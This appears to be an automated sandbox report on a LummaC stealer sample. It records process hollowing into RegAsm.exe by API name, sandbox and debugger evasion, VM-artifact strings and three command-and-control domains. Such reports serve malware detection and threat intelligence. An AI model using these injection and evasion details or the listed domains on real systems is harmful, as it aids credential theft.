Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004452E0	3_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415352	3_2_00415352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004103A8	3_2_004103A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407450	3_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00405470	3_2_00405470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409402	3_2_00409402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0044A510	3_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004115B0	3_2_004115B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D610	3_2_0041D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00449620	3_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A6E0	3_2_0040A6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B6B0	3_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043F700	3_2_0043F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041E71A	3_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0044B720	3_2_0044B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004087F0	3_2_004087F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00428833	3_2_00428833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004338C0	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004408E6	3_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004038A0	3_2_004038A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00434990	3_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040ABA0	3_2_0040ABA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EBBC	3_2_0042EBBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00437CD0	3_2_00437CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00449D22	3_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407E50	3_2_00407E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00427E6C	3_2_00427E6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00437F30	3_2_00437F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DFE0	3_2_0042DFE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768

Source: FoS5cjKhd3.exe, 00000001.00000000.2195601280.00000000009DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exeD vs FoS5cjKhd3.exe
Source: FoS5cjKhd3.exe, 00000001.00000002.2203682529.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FoS5cjKhd3.exe
Source: FoS5cjKhd3.exe	Binary or memory string: OriginalFilenameVQP.exeD vs FoS5cjKhd3.exe

Source: FoS5cjKhd3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FoS5cjKhd3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/7@2/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004402A0 CoCreateInstance,

3_2_004402A0

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FoS5cjKhd3.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5344

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\481a45e4-981a-4a51-a7d5-0e297a759c60

Jump to behavior

Source: FoS5cjKhd3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FoS5cjKhd3.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FoS5cjKhd3.exe

ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\FoS5cjKhd3.exe "C:\Users\user\Desktop\FoS5cjKhd3.exe"
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1772
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: FoS5cjKhd3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FoS5cjKhd3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: FoS5cjKhd3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\rje\tg\ev8pv\obj\Release\ojc.pdb source: FoS5cjKhd3.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00438B7E push cs; iretd

3_2_00438B85

Source: FoS5cjKhd3.exe

Static PE information: section name: .text entropy: 7.995414657968518

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Memory allocated: 4CD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe TID: 6260	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5068	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:q
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_3-19225

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004476D0 LdrInitializeThunk,

3_2_004476D0

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: FoS5cjKhd3.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: FoS5cjKhd3.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: FoS5cjKhd3.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Code function: 1_2_02CD2151 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

1_2_02CD2151

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
